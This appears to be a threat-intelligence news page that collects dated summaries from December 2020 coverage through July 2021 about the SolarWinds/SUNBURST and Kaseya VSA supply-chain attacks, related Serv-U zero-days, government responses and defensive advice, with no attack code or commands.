Live Updates: Supply-Chain Attacks - SolarWinds/Solorigate (SUNBURST), Kaseya VSA, and More

An alleged Russia-backed hacking group is believed to have targeted and breached the U.S. Departments of Treasury and Commerce. According to Reuters, the breach originated from a supply chain attack that leveraged Orion - the widely-used network monitoring tool from SolarWinds, an IT company that supports several federal agencies and the U.S. military. Last week, cybersecurity company FireEye had reported a similar attack carried out via the SolarWinds platform that led to the compromise of its “red teaming” tools. It is believed that a large number of organizations that use this software might be at risk. The malware used in this widespread "UNC2452" campaign is being tracked by several names including Solorigate and SUNBURST.

Cyware has created this resource to collect and share live alerts on this campaign, impacted organizations as reported in the media, indicators of compromise (IOCs), and other relevant threat intelligence. We are actively working to keep this page updated and accurate in order to ensure that it is timely and relevant to as many people as possible.

Solutions and Countermeasures

Advisories

Indicators of Compromise (IOCs)

Threat Response Workflow

Killswitch

Network Auditing Tool

_______________________________________________________________________________________

(July 27, 2021)


How network segmentation can protect supply chains from ransomware attacks

Network segmentation has proven helpful in mitigating common ransomware attacks, especially those arising from breached IoT devices, third-party vendors, and the like. Part of this has to do with its main benefits: it eliminates network congestion, improving overall performance, and it improves intrusion control by making detected threats easy to contain. Moreover, it limits access to specific sensitive data and information by zoning it into a more secure network segment.


_______________________________________________________________________________________

(July 26, 2021)


Why code signing best practices are vital to hardening security

Code signing, and the process of establishing and ensuring trust, has become more critical alongside the growing reliance on software that users purchase from third-party vendors and build and deploy within their own organizations using everything from PowerShell and Bash scripts to containers, libraries, files, and executables.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 26, 2021)


When software updates get hacked

The attack against Kaseya — attributed to the Russia-linked REvil ransomware-as-a-service (RaaS) group — is part of a trend of cybercriminals and espionage operators targeting the suppliers of administrative software used by companies to manage their environments.

Ref - Dark Reading 

_______________________________________________________________________________________

(July 23, 2021)


Supply-chain threats and client-side vulnerabilities

The software supply chain attacks that target applications are growing in large part because the attack surface for these threats has exploded. And that is the result of the latest trends in app development. Evolving client-side app protection technologies are an important factor in reducing cyber risk.

Ref - Barracuda 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya Ransomware attack explained

REvil attacked Kaseya’s VSA SaaS platform using zero-day exploits to gain access and distribute malicious software to Kaseya’s customers and their systems. From there, the ransomware gang used weaknesses on those systems to encrypt everything. Because the malware was already wrapped in the platform, it was signed by Kaseya’s platform and, as a result, got past everything on these clients’ systems.

Ref - PurpleSec

_______________________________________________________________________________________

(July 23, 2021)

The lessons to be learned from the Colonial Pipeline attack

The Colonial Pipeline attack – coupled with the backlash in the wake of both the SolarWinds and Codecov attacks – has led many to wonder if the executive order is enough. This unease has prompted top executives from firms like Microsoft, Amazon and Cisco to call for an international coalition to combat the global increase in ransomware.

Ref - TechRadar 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya gets master decryptor to help customers still suffering from REvil attack

Kaseya said it has obtained a decryptor that should successfully restore data encrypted during the Fourth of July weekend attack. Kaseya spokeswoman Dana Liedholm described the source of the decryptor as a trusted third party, declining to elaborate or comment on whether a ransom was paid.


_______________________________________________________________________________________

(July 23, 2021)

Getting ahead of supply-chain risks

The fact that supply chains have become so global has created new risk in terms of the reliability and availability of certain things. To make sure these supply chains are properly managed, it is important to understand where the risk is, get ahead of it, and anticipate security needs and address them before they become problems.

Ref - McKinsey 

_______________________________________________________________________________________

(July 22, 2021)

Tracking the trail of software: The key to boosting security

There is an emerging set of best practices that Google and other software companies have developed in collaboration with the U.S. government to help deliver more secure software. The key is to be able to ensure a ‘certified and known’ good version of the software at any given time, down to the very smallest component code.

Ref - Forbes 

_______________________________________________________________________________________

(July 22, 2021)

DevSecOps: The key to securing supply chain in a multi-cloud threatscape

DevSecOps is all about leveraging your CI/CD platform and containers, increasing testing and scanning across the SDLC, and minimizing manual security measures with AI/ML. Businesses that employ a DevSecOps framework will not only bolster breach prevention but also add business value, as they deliver safer products and services that better protect their businesses and customers.

Ref - InfoQ

_______________________________________________________________________________________

(July 22, 2021)


Things that changed after the SolarWinds attack

One of the most significant impacts of the SolarWinds attack has been that cybersecurity is finally getting the attention it deserves at the highest levels of the U.S. government. It is spurring real changes in policy and actions among the public and private sectors. Organizations must take the lessons learned from this attack seriously and quickly move to improve resiliency and strengthen their own cybersecurity practices.

Ref - Trustwave 

_______________________________________________________________________________________

(July 22, 2021)

Who is responsible for improving security in the software development environment?

Venafi announced the findings of a global survey that evaluates the impact of software supply chain attacks like SolarWinds/SUNBURST, CodeCov, and Kaseya/REvil on how development organizations are changing their approach to securing software build and delivery environments.


_______________________________________________________________________________________

(July 21, 2021)


New bill would make some companies report cyberattacks to the government

A new bill unveiled Wednesday would make some companies tell the government when they’ve been hacked. The bipartisan Cyber Incident Notification Act is a response to the recent attacks on SolarWinds, which impacted government agencies, and Colonial Pipeline, which disrupted access to fuel across a large region of the country. Since then, ransomware attacks — where hackers encrypt files until a victim pays a ransom — have proliferated.

Ref - CNBC 

_______________________________________________________________________________________

(July 21, 2021)

Following SolarWinds & Colonial hacks, a new Bipartisan Cyber Reporting Bill introduced

A new bipartisan Cyber Incident Notification Act of 2021 would require federal government agencies, federal contractors, and critical infrastructure operators to notify the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) when a breach is detected. With this, the U.S. government can mobilize to protect critical industries across the country.

Ref - Senate.gov 

_______________________________________________________________________________________

(July 21, 2021)

A risk management cybersecurity imperative for State, Local & Tribal Governments

The cyber-attack using the SolarWinds vulnerability raised alarms throughout the federal government, as data on many agency networks was presumably compromised. The extent of the damage from SolarWinds (and other recent breaches) is still being investigated and mitigated. The breach not only impacted federal systems but also state, local, and Tribal government (SLTG) systems and databases.

Ref - Forbes 

_______________________________________________________________________________________

(July 20, 2021)

Why securing against IT supply chain attacks is crucial

Given the prevalence of the software being targeted in the supply chain attacks, it’s more about securing any company’s internal environment from supply chain attacks, rather than securing the supply chain itself. As attacks against these building blocks increasingly become a key part of threat actors’ playbook, taking proper steps to secure the enterprise’s IT supply chain is crucial to maintaining an effective cybersecurity program.

Ref - Medium 

_______________________________________________________________________________________

(July 20, 2021)

Top 5 things to know about supply chain attacks

There are five key things to know about supply chain attacks. They do not attack victims directly but target their suppliers. They can affect almost any industry, including finance, energy, manufacturing, and transportation. They may or may not involve hardware or the internet. Attackers often try to compromise open source development or distribution to gain a foothold in companies. Moreover, there are several ways to safeguard against such threats.

Ref - TechRepublic 

_______________________________________________________________________________________

(July 19, 2021)


How to prevent supply chain attacks by securing DevOps

With threat actors focusing more intently on supply chain attacks, building security into the development process becomes mission-critical. Software developers need to embrace DevSecOps to prevent their applications from being used in a supply chain attack. They can do this by creating standards that ensure coding best practices, especially when third-party code is involved.


_______________________________________________________________________________________

(July 19, 2021)

Biden Administration blames hackers tied to China for Microsoft cyberattack spree

The Biden administration publicly blamed hackers affiliated with China’s main intelligence service for a far-reaching cyberattack on Microsoft Corp. email software this year, part of a global effort by dozens of nations to condemn Beijing’s malicious cyber activities. The U.S. government has high confidence that hackers tied to the Ministry of State Security, or MSS, carried out the unusually indiscriminate hack of Microsoft Exchange Server software that emerged in March, senior officials said.


_______________________________________________________________________________________

(July 19, 2021)

Breaking down the threat of going all-in with Microsoft security

Recent cyber events over the last several months have highlighted a critical need for enterprises to stop depending on a single vendor for security in order to limit risk. A ship with an unsegmented hull is prone to sinking very quickly when damaged. Companies that segment their security infrastructure across multiple vendors, on the other hand, are like ships with several compartments: when one area is compromised, the whole ship isn't immediately exposed.

Ref - Darkreading 

_______________________________________________________________________________________

(July 19, 2021)

Kaseya ransomware attack FAQ

According to Kaseya CEO Fred Voccola, less than 0.1% of the company's customers were embroiled in the breach -- but as their clientele includes MSPs, this means that smaller businesses have also been caught up in the incident. Present estimates suggest that 800 to 1500 small to medium-sized companies may have experienced a ransomware compromise through their MSP.

Ref - ZDNet 

_______________________________________________________________________________________

(July 18, 2021)

Password attacks on Microsoft highlight the need for Passwordless Zero Trust Systems

President Biden, the National Security Agency, and the Department of Defense have all made major public statements encouraging companies to move from traditional perimeter defense-based systems to Zero Trust systems. The policy is shifting for federal contractors such that Zero Trust is quickly becoming not just an option, but the regulation standard. Other industries must follow suit to protect their financial interests, intellectual property, and reputations.


_______________________________________________________________________________________

(July 17, 2021)

CloudFlare CDNJS bug could have led to widespread supply-chain attacks

Web infrastructure and website security company Cloudflare last month fixed a critical vulnerability in its CDNJS library that's used by 12.7% of all websites on the internet. The weakness concerned an issue in the CDNJS library update server that could potentially allow an attacker to execute arbitrary commands, leading to a complete compromise.


_______________________________________________________________________________________

(July 16, 2021)

Several security pros not confident about supply chain attack security - Report

According to a new report from machine identity management firm Venafi, many security pros aren't confident they could repel a major supply chain attack. Polling more than 1,000 information security professionals, developers, and executives in the IT and software development industries for the report, Venafi found that almost half (48%) believe security teams are responsible, with the same percentage saying their development teams are responsible.


_______________________________________________________________________________________

(July 16, 2021)

Kaseya attack - How to fight this unique attack technique

The Kaseya attack differs from typical ransomware attacks: it started with a zero-day, which is unusual, so it is hard to name a best practice that would have avoided it, and many of the companies that were infected were already following best practices. There were still mistakes, such as exposing the platform to the internet; it was mostly exposed so that people could work remotely during the pandemic and to increase online availability. It also looks like there was an overuse of what are called endpoint protection exclusions.


_______________________________________________________________________________________

(July 15, 2021)

With software supply chain attacks escalating, who is responsible for increasing security

According to Venafi’s survey, respondents nearly unanimously agree (97%) that the techniques and procedures used to attack the SolarWinds software development environment will be reused in new attacks this year. Despite this certainty, there is no alignment between security and development teams on which team should be responsible for improving security in the software build and distribution environments.

Ref - Yahoo

_______________________________________________________________________________________

(July 15, 2021)

iOS zero-day let SolarWinds hackers compromise fully updated iPhones

The Russian state hackers who orchestrated the SolarWinds supply chain attack last year exploited an iOS zero-day as part of a separate malicious email campaign aimed at stealing Web authentication credentials from Western European governments. Attacks targeting CVE-2021-1879, as the zero-day is tracked, redirected users to domains that installed malicious payloads on fully updated iPhones.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 14, 2021)

Targeted attack activity heightens need for firms to patch new SolarWinds flaw

Organizations that have not yet patched against a critical remote code execution vulnerability disclosed this week in SolarWinds' Serv-U file transfer technology for Windows might want to do so quickly. Microsoft is presently tracking the attacker as DEV-0322. The group has used commercial VPN technologies and compromised consumer routers in previous attack activities.

Ref - Darkreading 

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers threat actor targeting SolarWinds software

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft

_______________________________________________________________________________________

(July 13, 2021)

Identity administration platform may be the weak link post-RMM supply-chain attack

Recent ransomware attacks that used a compromised Remote Monitoring and Management (RMM) platform to access endpoints and push malicious executables to them are forcing security teams to re-evaluate such centralized platforms, which have a very large blast radius. These incidents have again shown the need for organizations to move to infrastructure designed with Zero Trust principles in mind.

Ref - Medium

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers critical SolarWinds zero-day under active attack

An attacker can gain privileged access to exploited machines hosting Serv-U products and could then install programs; view, change or delete data; or run programs on the affected system. The vulnerability exists in the latest Serv-U version 15.2.3 HF1, released on May 5, and all prior versions.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 12, 2021)

SolarWinds patches critical Serv-U vulnerability exploited in the wild

SolarWinds is urging customers to patch a Serv-U remote code execution vulnerability exploited in the wild. According to SolarWinds, "if SSH is not enabled in the environment, the vulnerability does not exist." SolarWinds has addressed the security vulnerability reported by Microsoft with the release of Serv-U version 15.2.3 hotfix (HF) 2.


_______________________________________________________________________________________

(July 12, 2021)

SolarWinds confirms new zero-day flaw under attack

In a recent advisory, SolarWinds said a single threat actor exploited security flaws in its Serv-U Managed File Transfer and Serv-U Secure FTP products against a limited, targeted set of customers. This zero-day is new and completely unrelated to the SUNBURST supply chain attacks.

Ref - SecurityWeek 

_______________________________________________________________________________________

(July 11, 2021)

JustTech and its clients impacted in Kaseya supply-chain ransomware attack

JustTech disclosed that the company and its clients were victims of the recent cyber-attack that has been reportedly attributed to a criminal gang in Russia known as REvil. For JustTech, it is believed the cyber-attack began at 12:31 PM Eastern Standard Time on Friday, July 2nd. JustTech discovered the breach, and disabled and shut down the affected servers, within 8 minutes.

Ref - JustTech 

_______________________________________________________________________________________

(July 9, 2021)

Securing the supply chain: Lessons learned from the Codecov compromise

Rapid7 researchers provided the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. The guidance covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

Ref - Rapid7
 
_______________________________________________________________________________________

(July 9, 2021)

SolarWinds Serv-U remote memory escape vulnerability

SolarWinds was recently notified by Microsoft of a security vulnerability (CVE-2021-35211) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and has developed a hotfix to resolve this vulnerability. Microsoft’s research indicates that exploitation of this vulnerability involves a limited, targeted set of customers and a single threat actor.

Ref - Solarwinds 

_______________________________________________________________________________________

(July 8, 2021)

Kaseya left its customer portal vulnerable to a 2015 flaw in its own software

On July 3, security incident response firm Mandiant notified Kaseya that their billing and customer support site — portal.kaseya.net — was vulnerable to CVE-2015-2862, a “directory traversal” vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser. As its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya’s customer portal was still exposed to the data-leaking weakness.


_______________________________________________________________________________________

(July 8, 2021)

FERC and NERC publish a whitepaper on SolarWinds and related supply chain compromise

On July 6, 2021, the staff of the FERC and the NERC E-ISAC issued a whitepaper entitled “SolarWinds and Related Supply Chain Compromise – Lessons for the North American Electricity Industry.” The whitepaper describes these major supply chain-related cybersecurity events and the key actions to take to secure systems.

Ref - JD Supra 

_______________________________________________________________________________________

(July 8, 2021)

NJCCIC recommendations on widespread supply chain ransomware attack

The NJCCIC recommends MSPs using VSA follow the guidance from Kaseya and disconnect VSA servers until notified by Kaseya that it is safe to connect them after an update is applied to remediate the exploited vulnerability. A tool to scan systems for signs of exploitation is available and the incident overview and technical details are also provided by Kaseya on their website.

Ref - NJCCIC 

_______________________________________________________________________________________

(July 8, 2021)

Analyzing Supply Chain Attacks

While software vulnerabilities still play a role in breaching organizations’ defenses, the software supply chain introduces an inordinate degree of new opportunities to introduce malicious artifacts and to execute unauthorized activities from within. It is important to note that malware is not a vulnerability, so it can neither be detected nor resolved using the same methods.

Ref - AquaSec 

_______________________________________________________________________________________

(July 8, 2021)

Global ransomware supply-chain attack takes a small Maryland town offline

Leonardtown, a town in Maryland, had been a victim of the massive ransomware attack that breached a popular software made by the information technology company Kaseya. The attack reached Leonardtown through its IT management company, JustTech, which uses the affected Kaseya product.


_______________________________________________________________________________________

(July 7, 2021)

REvil Ransomware Attack on Kaseya VSA - Detailed technical analysis

Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly. It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers and the team at DIVD.nl disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch.

Ref - Varonis 

_______________________________________________________________________________________

(July 7, 2021)

Analyzing the REvil Ransomware attack

In the recent attack on Kaseya, the ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server platform. Security researchers have identified three zero-day vulnerabilities potentially used in attacks against Kaseya’s clients: an authentication bypass, an arbitrary file upload, and a code injection vulnerability.

Ref - Qualys 

_______________________________________________________________________________________

(July 7, 2021)

The massive Kaseya ransomware attack - Key things to know and learn

The attack on Kaseya points to a popular target for ransomware attackers: Managed Service Providers. MSPs such as Kaseya's customers allow companies to outsource certain software and services, such as IT management, to third parties, which can help avoid the cost of having to employ such experts in-house.

Ref - CNN 

_______________________________________________________________________________________

(July 7, 2021)

In the Kaseya supply chain ransomware attack, history repeats itself

Though details of the recent international ransomware campaign (via Kaseya) are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

Ref - CyberArk 

_______________________________________________________________________________________

(July 7, 2021)

Deconstructing the REvil Ransomware attack on Kaseya VSA

After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Kaseya VSA administrative access was disabled to the compromised servers and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in their networks.


_______________________________________________________________________________________

(July 7, 2021)

Kaseya VSA ransomware attack, SolarWinds hack share many similarities

Last weekend’s Kaseya VSA supply chain ransomware attack and last year’s giant SolarWinds hack share a number of similarities. The attacks on Kaseya and SolarWinds share the most “sinister point” of compromise. That’s the trust between a vendor and a client. Key among the differences, however, is that the exploit of the Kaseya VSA product led to the injection of ransomware into the endpoints managed by Kaseya VSA on-premises users, while the SolarWinds attack led to data exfiltration.


_______________________________________________________________________________________

(July 7, 2021)

REvil ransomware gang’s major supply chain attack may affect over 1,500 customers

Although it was initially believed that only 50 companies using VSA on-premises were targeted by REvil, the evolving situation reveals more potential victims as numbers climb to the tune of 1,500-2,000 companies likely exposed to downstream impact by this major attack. The number of potential victims can be so much larger because Kaseya’s customers themselves are MSPs who serve a customer base of their own.


_______________________________________________________________________________________

(July 6, 2021)

The key lessons from Kaseya cyber attack

The solution to the Kaseya attack is more than detection and protection. It requires policy, regulations, law enforcement, diplomacy, criminal ecosystem disruption, and reducing the benefit of the crime.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers breached RNC via Synnex in a new attack

The Russian government hackers behind the SolarWinds campaign breached the computer systems of the Republican National Committee through Synnex in a new attack. There is no indication, however, that the RNC itself was hacked or that any RNC information was stolen.

Ref - CRN 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya ransomware: a software supply chain attack or not?

The newly discovered vulnerability, initially known only to the attackers, allowed them to exploit the on-premise version of the Kaseya software, and ultimately conduct the ransomware attack. And, because so many of Kaseya's customers are MSPs, the attackers were able to pass the ransomware attack downstream to as many as 1,500 small and medium-size businesses that outsource everyday IT functions.

Ref - Sonatype 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya says it's seen no sign of a supply chain attack

Kaseya has said it’s been unable to find signs its code was maliciously modified and offered its users a ray of hope with the news that it is testing a patch for its on-prem software and is considering restoring its SaaS services on Tuesday.


_______________________________________________________________________________________

(July 6, 2021)

How can a business ensure the security of its supply chain?

The reality is that supply chain attacks are not going away. In the first quarter of 2021, 137 organizations reported experiencing supply chain attacks at 27 different third-party vendors, while the number of supply chain attacks rose 42% from the previous quarter. Therefore, it becomes important for businesses to mitigate risk when it comes to the increased threat from supply chain attacks.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers still targeting Microsoft, focus on support staff

Microsoft's Threat Intelligence Center's investigation detected information-stealing malware on a machine belonging to one of Microsoft's customer support agents with access to basic account information for a small number of our customers. The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.


_______________________________________________________________________________________

(July 6, 2021)

Kaseya supply chain ransomware attack - Technical analysis

The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.

Ref - ZScaler
 
_______________________________________________________________________________________

(July 6, 2021)

Ransomware group connected to JBS incident thought to be behind massive MSP supply chain attack

While most Americans were preparing for the July 4 holiday weekend by picking up burgers and beers, the hackers thought to be responsible for the JBS ransomware incident were readying a supply chain attack timed to hit when IT workers were off duty. An attack on managed service providers (MSPs) making use of Kaseya products is thought to have compromised at least 200 of that company’s clients, and possibly as many as tens of thousands in total.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 5, 2021)

New supply chain ransomware attack targets

The sophisticated supply-chain ransomware attack targeting Kaseya initially leveraged a vulnerability in the Kaseya VSA software to gain access to victim organizations and then used REvil’s RaaS to infect those organizations with ransomware. Reports claim that a malicious update was deployed to the Kaseya VSA interface by the threat actors as an update or hotfix for the Kaseya VSA agent.

Ref - Fortinet 

_______________________________________________________________________________________

(July 5, 2021)

Kaseya crippled by supply chain attack

REvil compromised Kaseya VSA servers and is currently using them to deploy and distribute their ransomware. The ransomware encryptors are contained in the file agent.exe. When this file is activated, both an old yet legitimate copy of Windows Defender, MsMpEng.exe, and the encryptor payload, mpsvc.dll, are dropped into the C:\Windows path for DLL sideloading - a process where a malicious DLL file is loaded in place of a legitimate one.

Ref - Upguard 

_______________________________________________________________________________________

(July 5, 2021)

Real-time prevention of the Kaseya VSA supply chain REvil ransomware attack

In the Kaseya attack, most of the attacked endpoints were Windows servers. This attack is particularly evasive because all the attack chain components are signed with digital certificates, starting from the Kaseya process, continuing with a vulnerable Microsoft Defender process, and ending with the side-loaded signed ransomware.

Ref - Morphisec 

_______________________________________________________________________________________

(July 5, 2021)

Over 1000 organizations globally attacked on Fourth of July weekend, biggest supply chain attack since Sunburst

To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack. 

Ref - CheckPoint

_______________________________________________________________________________________

(July 5, 2021)


US spy agencies investigate Kaseya supply chain attack

President Biden has ordered his intelligence agencies to investigate a major ransomware supply chain attack over the weekend that targeted a vendor of IT software used by managed service providers (MSPs). Suspected to be the work of a REvil affiliate, the attack on Miami-headquartered Kaseya was spotted by its incident response team at around midday on Friday.


_______________________________________________________________________________________

(July 5, 2021)

Hackers’ sophisticated ransomware attack targeted a flaw in IT management

The hackers behind a mass ransomware attack exploited multiple previously unknown vulnerabilities in IT management software made by Kaseya Ltd., the latest sign of the skill and aggressiveness of the Russia-linked group believed responsible for the incidents.

Ref - Fortune 

_______________________________________________________________________________________

(July 5, 2021)


IT for Kaseya defers decision about SaaS restoration after supply chain attack

IT management software provider Kaseya has deferred an announcement about the restoration of its SaaS services, after falling victim to a supply chain attack that has seen its products become a delivery mechanism for the REvil ransomware. On learning of the attack, Kaseya urged customers to pull the plug on their VSA servers, because the attack shuts off administrator access to the suite. The company also shuttered its SaaS services as a precautionary measure.

Ref - The Register 

_______________________________________________________________________________________

(July 4, 2021)

Guidance for MSPs and their customers affected by the Kaseya VSA supply-chain

CISA and FBI recommend that MSP customers affected by the Kaseya VSA supply-chain attack take immediate action to implement cybersecurity best practices. They recommend downloading and using the Kaseya VSA Detection Tool. The agencies also recommend enabling and enforcing multi-factor authentication (MFA) on every single account that is under the control of the organization.

Ref - US Cert 

_______________________________________________________________________________________

(July 4, 2021)

Kaseya supply chain attack targeting MSPs to deliver REvil ransomware

The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.

Ref - TrueSec

_______________________________________________________________________________________

(July 4, 2021)

How Russian spies hacked the Justice, State, Treasury, Energy and Commerce Departments

The Department of Homeland Security spent billions on a program called "Einstein" to detect cyber attacks on government agencies. The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.

Ref - CBS News 

_______________________________________________________________________________________

(July 4, 2021)

Independence Day: REvil uses supply chain exploits to attack hundreds of businesses

REvil’s operators posted to their “Happy Blog”, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, but under the condition that they be paid $70,000,000 worth of Bitcoin.

Ref - Sophos 

_______________________________________________________________________________________

(July 4, 2021)

How U.S. cyber policy changed after SolarWinds

Since the disclosure of SolarWinds attacks and since the formation of the new government in the United States, several things have changed in the cybersecurity world. The Biden Administration imposed sanctions on Russia, ordered new cybersecurity standards for federal contracts with software companies, and chose the nation's first National Cyber Director.

Ref - CBS News 

_______________________________________________________________________________________

(July 3, 2021)

Kaseya ransomware supply chain attack: Key things to know

Several hundred organizations have been targeted by the REvil (aka Sodinokibi) ransomware in a supply chain attack involving Kaseya VSA software and multiple Managed Service Providers (MSPs) who use it. REvil attacks are usually financially motivated. However, there are some signs that the attacks may be politically motivated disruption.

Ref - Symantec

_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack hits nearly 40 service providers

Threat actors behind the notorious REvil cybercrime operation appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. Following the incident, the IT and security management services company said it took immediate steps to shut down its SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised.


_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack: What we know so far

Kaseya IT management software, commonly used in Managed Service Provider (MSP) environments, had been hit by another in a series of supply-chain hacks. As with the SolarWinds incident, this latest attack uses a two-step malware delivery process sliding through the back door of tech environments. The cybercriminals behind this attack apparently had monetary gain rather than cyber espionage in their sights, eventually planting ransomware while exploiting the trust relationship between Kaseya and its customers.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware gang executes supply chain attack via malicious Kaseya update

The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions and is using a malicious update for the VSA software to deploy ransomware on enterprise networks.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware hits 1,000+ companies in MSP supply-chain attack

Researchers are tracking 20 MSPs where Kaseya VSA was used to encrypt over 1,000 businesses and are working in close collaboration with six of them. They have proof that their customers are being encrypted as well. Kaseya issued a security advisory on their help desk site, warning all VSA customers to immediately shut down their VSA server to prevent the attack's spread while investigating.


_______________________________________________________________________________________

(July 2, 2021)

Kaseya VSA Supply-Chain Ransomware Attack

CISA is taking action to understand and address the recent supply-chain ransomware attack against Kaseya VSA and the multiple managed service providers (MSPs) that employ VSA software. CISA encourages organizations to review the Kaseya advisory and immediately follow their guidance to shut down VSA servers.

Ref - US Cert 

_______________________________________________________________________________________

(July 2, 2021)

Improve supply chain security with intelligence from surface, deep & dark web

In the past several months, the SolarWinds attack and the subsequent fallout have forced organizations to reexamine their supply chain security approach. Mitigating the supply chain threats involves a blended approach that includes secure development processes, vulnerability scanning and management, and endpoint security alongside effective vendor governance practices.


_______________________________________________________________________________________

(July 1, 2021)

Kaseya VSA supply-chain ransomware attack - Sophos report

Sophos said that the supply chain attack that uses Kaseya to deploy a variant of the REvil ransomware into a victim’s environment is geographically dispersed. It appears that the attackers used a zero-day vulnerability to remotely access internet-facing VSA Servers.

Ref - Sophos

_______________________________________________________________________________________

(June 30, 2021)

11 Tactics to prevent supply chain attacks

To prevent supply chain attacks, organizations can follow these strategies. They include deploying honeytokens, securing Privileged Access Management, and implementing a Zero Trust Architecture. Organizations should also plan their security on the assumption that they will be attacked.

Ref - Upguard 

_______________________________________________________________________________________

(June 29, 2021)

Improving the security of your supply chain through integration

To counter the threat of a supply chain incursion, companies are well served by the latest generation of highly specialized threat intelligence solutions. Take a breach and attack simulation (BAS) tool like Cymulate for example. BAS solutions can help reduce supply chain risk by conducting ongoing, automated penetration testing. They identify vulnerabilities by mimicking the tactics used by bad actors and showing you where you’re most exposed.

Ref - Mimecast 

_______________________________________________________________________________________

(June 29, 2021)

Zero-Trust doesn’t mean zero breaches

The detailed and specific answer to any particular breach depends on the actual mechanism incorporated for the initial infection and/or propagation. In the case of SolarWinds, the initial infection threat vector is unknown. Its dissemination technique, on the other hand, is as public as it is horrifying: the previously trusted software supply chain.

Ref - Forrester 

_______________________________________________________________________________________

(June 29, 2021)

Denmark's central bank exposed in SolarWinds hack

Denmark's central bank was compromised in last year's global SolarWinds hacking operation, leaving a "backdoor" to its network open for seven months. The backdoor stood open at the Danish central bank for seven months until it was discovered by U.S. security firm FireEye, Version2 said, citing various documents it obtained under a freedom of information request, such as SolarWinds emails.

Ref - Reuters 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies an average of $12 million

A recent ‘2021 Cybersecurity Impact Report’ from IronNet has revealed some interesting facts about the SolarWinds attack. The report is based on interviews with 473 security IT decision-makers from the U.S., U.K., and Singapore who work in the technology, financial, public service, and utility sectors. The survey found that 90% of respondents said their security posture had improved over the last two years, but 86% suffered attacks severe enough to require a meeting of the companies' C-level executives or boards of directors.


_______________________________________________________________________________________

(June 28, 2021)


Some UW institutions used software compromised by Russian hackers - US Officials

Email records show University of Wisconsin System cybersecurity staff raced to determine whether any of its 26 campuses or central office had been impacted by the global SolarWinds hacking incident discovered in December 2020. According to documents, some UW institutions were running the compromised software, though it's unclear whether attackers stole information or disrupted university networks.

Ref - WPR.org 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds hackers continue the assault with a new Microsoft breach

The nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers. The hacking group also compromised three entities using password-spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of login guesses.

Ref - Wired 

_______________________________________________________________________________________

(June 28, 2021)


Microsoft says new breach discovered in probe of suspected SolarWinds hackers

Microsoft said that an attacker had gained access to one of its customer-service agents and then used information from that to launch hacking attempts against customers. The company said it had found the compromise during its response to hacks by a team it identifies as responsible for earlier major breaches at SolarWinds and Microsoft.

Ref - Reuters

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies in key sectors 11% of total annual revenue

